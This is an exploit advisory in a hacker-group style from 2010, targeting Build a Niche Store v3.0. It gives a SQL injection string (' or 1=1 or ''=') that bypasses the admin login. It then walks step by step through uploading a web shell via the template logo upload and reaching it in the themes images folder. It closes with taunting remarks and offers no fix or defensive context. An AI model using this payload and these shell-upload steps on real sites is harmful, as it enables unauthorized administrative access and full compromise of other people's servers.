#########################################################################[+] Exploit Title : Build a Niche Store v3.0(BANS) Authentication
Bypass Vulnerability
[~] Author : ThunDEr HeaD
[~] Contact : thunderhead10@gmail.com
[~] Date :13-11-2010[~] HomePage : www.indishell.in[~] Price : $49.95[~] Version :3.0[~] Software: http://www.buildanichestore.com/[~] Vulnerability Style : Authentication Bypass / Shell Upload
[~] Vulnerability Dir : Shell By: themes/#########################################################################~~~~~~~~~~~~~~~~~~~~~~~~~[Greetz To]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~----==INDIAN CYBER ARMY ==----
We Are:-[SiLeNtp0is0n]-, stRaNgEr , inX_rOot , NEO H4cK3R , DarkL00k
, G00g!3 W@rr!0r , str1k3r, co0Lt04d , ATUL DWIVEDI ,
Jackh4xor , Th3 RDX
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[EXPLOIT]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~---==[Authentication Bypass]==---[1] Go to the URL:
http://server/admin
[2] Apply these details for login:
Username:' or 1=1 or ''='
PassWord:' or 1=1 or ''='[3] You will Redirected to Admin page:[4] Enjoy
---==[Uploading Shell]==---[1] Before Uploading you Must be Logged in(Admin Panel)[2] Go To Template Page:
http://server/admin/index.php?action=getTemplate
[3] Many Layout Options will be appeared, choose any one
[4] Click On upload logo (eg. layout 3 right)[5] Upload Your Shell
[6] After Uploading type the following link to access your shell
http://server/themes/layout-3-right/images/[7] DOne now time to rock \m/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Bug discovered :13 November 2010
finish(0);-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#End 0Day#
